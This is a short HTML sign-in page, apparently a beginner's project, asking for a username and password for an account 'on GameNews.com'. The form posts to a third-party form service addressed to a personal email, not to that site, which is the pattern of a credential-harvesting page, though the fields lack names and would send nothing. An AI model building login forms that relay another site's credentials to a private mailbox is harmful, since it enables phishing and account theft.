<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="css/sign-in.css">
    <title>Welcome!</title>
</head>

<body>
    <main>
        <form method="post" action="https://formspree.io/brooklynbaby@ukr.net" class="form">
            <h1>Use an existing account you have on GameNews.com</h1>
            <label>
               <h2>UserName:</h2>
               <input type="username" class = "username" required>
            </label>
            <label>
                <h4>Password:</h4>
                <input type="text" class = "password" required>
            </label>
            <label></br>
                <input type="submit" class = "submit" value = "SIGN IN">
            </label>

        </form>
    </main>
</body>

</html>





<style>
    * {
        max-width: 880px;
        margin: auto;
    }

    body {
        background-image: url(/img/sign.png);
        background-color: #161616;
    }


    h2 {
        font-size: 30px;

    }

    h1 {
        font-size: 45px;
        margin-top: 30px;
        margin-bottom: 50px;
    }

    h3 {
        font-size: 30px;
    }

    h4 {
        font-size: 30px;
    }

    h5 {
        font-size: 30px;
    }

    .form {
        border-left-style: solid;
        border-right-style: solid;
        border-top-style: solid;
        border-bottom-style: solid;
        border-color: #bfc0c1;
        color: #bfc0c1;
        text-align: center;
        margin-top: 70px;
    }

    .username {
        background-color: #161616;
        width: 350px;
        height: 30px;
        color: #bfc0c1;
    }


    .password {
        background-color: #161616;
        width: 350px;
        height: 30px;
        color: #bfc0c1;
    }

    .submit {
        font-weight: bold;
        background-color: #161616;
        margin-top: 40px;
        margin-bottom:40px;
        width: 100px;
        height: 40px;
        color: #bfc0c1;
    }
</style>
